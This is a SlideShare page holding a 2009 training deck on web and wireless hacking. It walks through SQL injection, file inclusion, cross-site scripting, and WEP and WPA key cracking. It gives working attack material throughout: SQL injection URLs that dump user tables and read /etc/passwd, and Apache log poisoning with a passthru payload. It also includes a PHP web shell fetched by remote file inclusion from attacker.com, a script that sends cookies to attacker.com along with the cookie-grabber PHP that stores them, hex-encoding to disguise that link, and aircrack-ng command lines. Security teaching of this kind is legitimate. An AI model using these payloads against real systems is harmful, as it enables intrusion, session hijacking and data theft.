Web & Wireless Hacking
2 likes1,715 views
This document discusses web and wireless hacking techniques. It covers SQL injection, file inclusion, cross-site scripting (XSS), war driving to find wireless networks, and exploiting wireless networks. Specific hacking methods are demonstrated for SQL injection, file inclusion, XSS attacks, and cracking WEP encryption on wireless networks. Tools mentioned include Kismet, Aircrack-ng, AirSnort, and Wireshark for finding wireless networks and cracking WEP.
![IPSECS
Vulnerable Code
• Example vulnerable code in login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" .
$_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• Username which's sent from login form is not
validated.
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-10-320.jpg)
![IPSECS
Vulnerable Code
• Example vulnerable code while inputing URI
parameters:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• Parameter 'aid' which's taken from URI is not
validated.
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-15-320.jpg)
![IPSECS
Vulnerable Code
• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module' which's taken from URI is
not validated.
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-26-320.jpg)
![IPSECS
Placing Malicious Log
• Placing malicious apache log uses telnet to inject
system command:
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
Host:example.com
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-29-320.jpg)
![IPSECS
Vulnerable Code
• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page' which's taken from URI is not
validated.
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-34-320.jpg)
![IPSECS
PHP Shell
• Simple web shell:
<?php
/*Basic PHP web shell injek.txt*/
if(isset($_GET['exec'])){
if(!empty($_GET['exec'])){
$cmd = $_GET['exec'];
if(function_exists('passthru')){
passthru($cmd);
}
}
}
?>
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-35-320.jpg)
![IPSECS
Vulnerable Code
• Example vulnerable code:
echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>n";
• Parameter 'key' which's sent from search form is
not validated.
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-43-320.jpg)
![IPSECS
Cookie Grabber
• Content of cookie-save.php:
<?php
/*Cookie stealer*/
$f = fopen('/tmp/cookie.txt', 'a');
$date = date("j F, Y, g:i a");
fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."n".
"Cookie : ". $_GET['c'] ."n".
"Date and Time : ". $date ."n".
"nn");
fclose($f);
?>
www.ipsecs.com](https://image.slidesharecdn.com/presentasi-makasar-110523101918-phpapp01/85/Web-Wireless-Hacking-47-320.jpg)
Web & Wireless Hacking
- 1. IPSECS WEB & WIRELESS HACKING Don “df0x” Anto Makasar, Juni 2009 www.ipsecs.com
- 2. IPSECS Content • Introduction • Web Exploitation – SQL Injection – File Inclussion – XSS • Breaking Wireless Infrastructure – War Driving – Exploiting Wireless Network www.ipsecs.com
- 3. IPSECS Introduction • Don “df0x” Anto • IT security researcher • Hacker?? Not, but IT security researcher • Contact – we@ipsecs.com • URL – http://ipsecs.com – http://kandangjamur.net • Bachelor degree in Electrical engineering • Add my facebook dj.antoxz@gmail.com www.ipsecs.com
- 4. IPSECS st 1 Day, WEB HACKING www.ipsecs.com
- 5. IPSECS Web Exploitation • It's exploiting web application programming flaws. • Programming mistakes are always happen. • Targeting clients or servers. • Possible to steal databases and other sensitif informations, steal cookie or session, execute arbitrary commands, or fully compromise the system. • It's easy to do. Google helps you :). www.ipsecs.com
- 6. IPSECS Common Web Exploitation • SQL Injection, an attack which's targeting sensitive information in database server. Possible to compromise system. • File Inclussion, an attack which usually to gain shell access on the remote target. – Local file inclussion – Remote file inclussion • Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website. – Doom – Persistent – Non-persistent www.ipsecs.com
- 7. IPSECS SQL INJECTION www.ipsecs.com
- 8. IPSECS SQL Injection • Injecting malicious SQL query to take profits. • Usually is used to bypass login, steal sensitive information on database. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
- 9. IPSECS SQL Injection in login form • User input in login form is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query through login form and bypassing login process. • Attacker can also execute other SQL query. www.ipsecs.com
- 10. IPSECS Vulnerable Code • Example vulnerable code in login process: $pass = md5($_POST['password']); $query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'"; $q = mysql_query($query); • Username which's sent from login form is not validated. www.ipsecs.com
- 11. IPSECS Exploit Login • Exploit code: username = admin' OR 'a'='a password = terserah • SQL query to be executed by database server is: SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' www.ipsecs.com
- 12. IPSECS SQL Injection in login form www.ipsecs.com
- 13. IPSECS SQL Logic • AND operator is executed before OR, result of query is: 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' • Boolean logic result is FALSE, then: username = 'admin' OR FALSE • Boolean logic result is TRUE (admin). • Attacker successfully bypassing login form. www.ipsecs.com
- 14. IPSECS SQL Injection in URI parameter • Parameter input in URI is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query by modifying parameter input. www.ipsecs.com
- 15. IPSECS Vulnerable Code • Example vulnerable code while inputing URI parameters: $query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ; $q = mysql_query($query); • Parameter 'aid' which's taken from URI is not validated. www.ipsecs.com
- 16. IPSECS Exploiting SQL Injection • Checking vulnerability using AND logic http://example.com/news.php?aid=1 AND 1=1-- http://example.com/news.php?aid=1 AND 1=0-- • Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1-- http://example.com/news.php?aid=1 UNION SELECT 1,2-- http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n-- www.ipsecs.com
- 17. IPSECS Knowing Number of Field www.ipsecs.com
- 18. IPSECS SQL Injection in URI parameter • In Case table which generates “news” contains 3 fields www.ipsecs.com
- 19. IPSECS Exploiting SQL Injection • Knowing tables in database http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- • Knowing fields in table 'tblUser' http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572-- www.ipsecs.com
- 20. IPSECS Knowing Tables in DB www.ipsecs.com
- 21. IPSECS Exploiting SQL Injection • Viewing information in tables http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser-- • Viewing arbitrary files (if FILE access is granted) http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)-- www.ipsecs.com
- 22. IPSECS Viewing Table Records www.ipsecs.com
- 23. IPSECS FILE INCLUSSION www.ipsecs.com
- 24. IPSECS File Inclussion • Including malicious or sensitive file to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command, or compromise system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
- 25. IPSECS Local File Inclussion • Including sensitive file in local server (vulnerable server) to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. www.ipsecs.com
- 26. IPSECS Vulnerable Code • Example vulnerable code: define('DOCROOT', '/var/www/html/modules'); $filename = DOCROOT . "/" . $_GET['module'] . ".php"; include($filename); • Parameter 'module' which's taken from URI is not validated. www.ipsecs.com
- 27. IPSECS Viewing Sensitive Files • Exploit code to viewing sensitive files on vulnerable system: http://example.com/index.php?module=../../../../../../../etc/passwd%00 http://example.com/index.php?module=../../../../../../../etc/group%00 www.ipsecs.com
- 28. IPSECS File /etc/passwd www.ipsecs.com
- 29. IPSECS Placing Malicious Log • Placing malicious apache log uses telnet to inject system command: $ telnet example.com 80 Trying example.com... Connected to example.com. Escape character is '^]'. GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1 Host:example.com www.ipsecs.com
- 30. IPSECS Malicious Log www.ipsecs.com
- 31. IPSECS Executing Command • Executing command via access_log apache (in case apache log is readable) http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=uname -a http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=id www.ipsecs.com
- 32. IPSECS Command “id” www.ipsecs.com
- 33. IPSECS Remote File Inclussion • Including sensitive file in remote server (attacker server) to be executed by server. • Usually to execute arbitrary command using web shell. Further attack can be used in fully compormising system. • User input is not well validated or no sanitation process. www.ipsecs.com
- 34. IPSECS Vulnerable Code • Example vulnerable code: $filename = $_GET['page'] . ".php"; include($filename); • Parameter 'page' which's taken from URI is not validated. www.ipsecs.com
- 35. IPSECS PHP Shell • Simple web shell: <?php /*Basic PHP web shell injek.txt*/ if(isset($_GET['exec'])){ if(!empty($_GET['exec'])){ $cmd = $_GET['exec']; if(function_exists('passthru')){ passthru($cmd); } } } ?> www.ipsecs.com
- 36. IPSECS Public PHP Shell • Widely known web shell : r57, c99 • Commonly used in exploiting remote file inclussion. www.ipsecs.com
- 37. IPSECS r57 www.ipsecs.com
- 38. IPSECS Executing Command • Injecting command: http://example.com/view.php? page=http://attacker.com/injek.txt&exec=id http://example.com/view.php? page=http://attacker.com/injek.txt&exec=ls -al www.ipsecs.com
- 39. IPSECS Command 'ls -al' www.ipsecs.com
- 40. IPSECS CROSS SITE SCRIPTING www.ipsecs.com
- 41. IPSECS Cross Site Scripting • Inserting HTML/java script code to be executed by client browser which views vulnerable website. • Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
- 42. IPSECS Cross Site Scripting • Doom based XSS, XSS in vulnerable file which comes from default installed software. • Non-Persistent XSS, XSS in vulnerable web page which can be exploited by tricking user to click malicious URI. Characteristic : temporal. • Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent. www.ipsecs.com
- 43. IPSECS Vulnerable Code • Example vulnerable code: echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>n"; • Parameter 'key' which's sent from search form is not validated. www.ipsecs.com
- 44. IPSECS Cross Site Scripting • Checking if XSS vulnerable: http://example.com/search.php?key=<script>alert('XSS found dude!')</script> www.ipsecs.com
- 45. IPSECS Cross Site Scripting www.ipsecs.com
- 46. IPSECS Cookie Stealing • Stealing cookie: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> • Content payload.js document.location="http://attacker.com/cookie-save.php? c="+document.cookie www.ipsecs.com
- 47. IPSECS Cookie Grabber • Content of cookie-save.php: <?php /*Cookie stealer*/ $f = fopen('/tmp/cookie.txt', 'a'); $date = date("j F, Y, g:i a"); fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."n". "Cookie : ". $_GET['c'] ."n". "Date and Time : ". $date ."n". "nn"); fclose($f); ?> www.ipsecs.com
- 48. IPSECS Hexal Encoding • Anonymize malicious URI using hexal encoding: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> HEXAL ENCODING http://example.com/search.php?key=%3c %73%63%72%69%70%74%20%73%72%63%3d %22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b %65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e %6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e www.ipsecs.com
- 49. IPSECS DEMO - Q&A WEB HACKING www.ipsecs.com
- 50. IPSECS THANK YOU! www.ipsecs.com
- 51. IPSECS nd 2 Day, WIRELESS HACKING www.ipsecs.com
- 52. IPSECS Wireless Network • Now, is widely used in campus, government, company, and many public places. • Provide network for mobile devices. • More flexible than wired network. • More insecure than wired network, so here we go! www.ipsecs.com
- 53. IPSECS War Driving • Activity to search Wi-Fi wireless network. • Public tools to do War Driving – Windows : NetStumbler, Wireshark – Linux : Kismet, AirCrack-ng, AirSnort, Wireshark – OSX : KisMac • I'm using Linux Ubuntu 8.10. www.ipsecs.com
- 54. IPSECS Kismet • Console based 802.11 wireless network detector and sniffer. • It identifies wireless network by pasively sniffing. • It's already exist on Ubuntu Repository or you can download from www.kismetwireless.net. • Use 'apt-get install kismet' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
- 55. IPSECS Kismet www.ipsecs.com
- 56. IPSECS Kismet www.ipsecs.com
- 57. IPSECS Kismet www.ipsecs.com
- 58. IPSECS AirSnort • GUI based 802.11 wireless network detector. • Designed for WEP Cracker. • It isn't ready on my Ubuntu repository, download from www.sourceforge.net. • Read the README to install. www.ipsecs.com
- 59. IPSECS aircrack-ng (formerly : aircrack) • Console based 802.11 wireless network detector. • Designed for WEP & WPA-PSK Cracker. • It's already exist on Ubuntu repository or you can downlod from www.aircrack-ng.org. • Use 'apt-get install aircrack-ng' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
- 60. IPSECS aircrack-ng (formerly : aircrack) airodump wlan0 www.ipsecs.com
- 61. IPSECS Wireshark • GUI based network protocol analyzer for UNIX and Windows. • The most complete protocol analyzer which support many data communication protocols. • It's already exist on Ubuntu repository or you can download from www.wireshark.org. • Use 'apt-get install wireshark' on Ubuntu,read the README if you want to install from source. www.ipsecs.com
- 62. IPSECS Wireshark www.ipsecs.com
- 63. IPSECS NetStumbler • Best known windows tool to find wireless networks. • It is function like Kismet on linux or KisMac on OSX. • You can download NetStumbler in www.netstumbler.com • Since I use ubuntu, there's no demo for this tool. www.ipsecs.com
- 64. IPSECS NetStumbler www.ipsecs.com
- 65. IPSECS Wireless Network Protection • MAC Filtering • WEP (Wired Equivalent Privacy) • WPA (Wi-Fi Protected Access) • WPA2 (Wi-Fi Protected Access 2) • Captive Portal www.ipsecs.com
- 66. IPSECS Exploiting Wireless Network • Miss Configuration (Human Error) • Spoofing • Cracking Protection • Denial of Service www.ipsecs.com
- 67. IPSECS Miss Configuration • Default Configuration on Device (Access Point) • Default Username & Password • Default Range IP Address • SNMP public & private community • No encryption enabled www.ipsecs.com
- 68. IPSECS Spoofing & Rogue AP • Spoofing MAC address to bypass MAC filtering. • Tools – Linux : ifconfig – Windows : smac, regedit • Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing. • Tools – airsnarf http://airsnarf.shmoo.com www.ipsecs.com
- 69. IPSECS MAC Spoofing www.ipsecs.com
- 70. IPSECS WEP Cracking • WEP is based on RC4 algorithm and CRC32. • Collecting as much as possible weak IV (Insialization Vector) to be used in FMS attack. • Accelerated collecting IV using traffic injection. • Tools : aircrack-ng, AirSnort www.ipsecs.com
- 71. IPSECS WEP Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with connected clients on it. Or do fake authentication to associate with AP if no client connected. • Inject packet using aireplay-ng • Dump packet using airodump-ng • Crack dumped file using aircrack-ng www.ipsecs.com
- 72. IPSECS Dumping Packet airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0 www.ipsecs.com
- 73. IPSECS Cracking Key aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap Key is “abcdef1234” www.ipsecs.com
- 74. IPSECS WPA Cracking • WPA is based on RC4 algorithm + TKIP/AES • WPA-PSK can be attack using dictionary attack. • Of course, it needs dictionary • Can be cracked when offline • Tools : aircrack-ng www.ipsecs.com
- 75. IPSECS WPA Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with which,s protected by WPA. • Dump packet using airodump-ng • Wait for a client to authenticate to AP, or deauthenticate client which's connected to AP. • Crack dumped file using aircrack-ng www.ipsecs.com
- 76. IPSECS WPA Cracking airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0 www.ipsecs.com
- 77. IPSECS WPA Cracking aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap Key is “miko2009” www.ipsecs.com
- 78. IPSECS Denial of Service • Making wireless network unavailable. • Tools : airjack, void11, aircrack www.ipsecs.com
- 79. IPSECS DEMO - Q&A WIRELESS HACKING www.ipsecs.com
- 80. IPSECS THANK YOU! www.ipsecs.com